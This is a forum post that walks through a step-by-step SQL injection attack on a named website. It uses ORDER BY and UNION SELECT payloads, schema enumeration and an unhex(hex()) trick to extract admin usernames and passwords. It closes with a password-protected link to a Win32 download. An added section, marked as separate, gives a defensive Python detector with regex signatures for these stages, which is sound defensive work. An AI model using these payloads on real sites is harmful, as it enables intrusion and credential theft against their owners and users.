pokokmen
New member

Here's a little tutorial on SQL injection
target = http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27
OK, let's just get started
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 --> Normal page
Let's test
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27' --> Error hehe
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 order by 1/* --> test the columns
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 order by 13/* --> column 13 gives an error => so it doesn't exist
http://www.myesia.com/esia.php?id=2...union all select 1,2,3,4,5,6,7,8,9,10,11,12/* --> the exposed columns are 2 and 4
Test the MySQL version
http://www.myesia.com/esia.php?id=2...l select 1,2,3,version(),5,6,7,8,9,10,11,12/* --> it's using MySQL version 5, hehe, so we can go through the schema
http://www.myesia.com/esia.php?id=2...8,9,10,11,12 from information_schema.tables/* --> all the tables have shown up
Just take the important one (admin)
http://www.myesia.com/esia.php?id=2...x3a,password),5,6,7,8,9,10,11,12 from users/* --> it won't extract, oh well
Second method: unhex(hex())
http://www.myesia.com/esia.php?id=2...a,password))),5,6,7,8,9,10,11,12 from users/* --> username and password found
Done, be nice hacker bro....
telnet tutorial
http://www.leetupload.com/dbindex2/index.php?dir=Win32/
password:crazy-coderz.net
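
Seen from the defender's side, each request in the post above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original post: a small detector that decodes logged query strings and labels the stages the post walks through. The stage names, the /news.php path, the IP addresses and the log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures for the stages the post walks through, matched on the decoded query.
STAGES = [
    ("quote_probe",    re.compile(r"'\s*(?:&|$)")),
    ("order_by_enum",  re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select",   re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version_probe",  re.compile(r"\bversion\s*\(\s*\)", re.I)),
    ("schema_enum",    re.compile(r"\binformation_schema\b", re.I)),
    ("hex_roundtrip",  re.compile(r"\bunhex\s*\(\s*hex\s*\(", re.I)),
    ("comment_cutoff", re.compile(r"/\*\s*$")),
]
# Common/combined log format: client IP first, request line in double quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(query):
    """Return the stage names whose signature appears in a raw query string."""
    decoded = unquote_plus(query)  # logs hold %20 / + / %27, not literal characters
    return [name for name, rx in STAGES if rx.search(decoded)]

def scan(lines, threshold=3):
    """Map client IP -> sorted distinct stages, for clients at or above threshold."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.groups()
        seen.setdefault(ip, set()).update(classify(urlsplit(target).query))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= threshold}

# Constructed access-log lines (documentation IPs, hypothetical /news.php).
SAMPLE_LOG = [
    '198.51.100.20 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?news=27 HTTP/1.1" 200 5120',
    '198.51.100.20 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 900',
    '203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /news.php?news=27%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [01/Jan/2024:10:01:09 +0000] "GET /news.php?news=27%20order%20by%2013/* HTTP/1.1" 500 310',
    '203.0.113.7 - - [01/Jan/2024:10:01:30 +0000] "GET /news.php?news=27+union+all+select+1,2,3,version(),5/* HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

Counting distinct stages per client, rather than alerting on any single match, keeps a lone apostrophe or a harmless "order by date" search from raising a flag. Detection of this kind complements, and does not replace, binding the news parameter through a parameterized query.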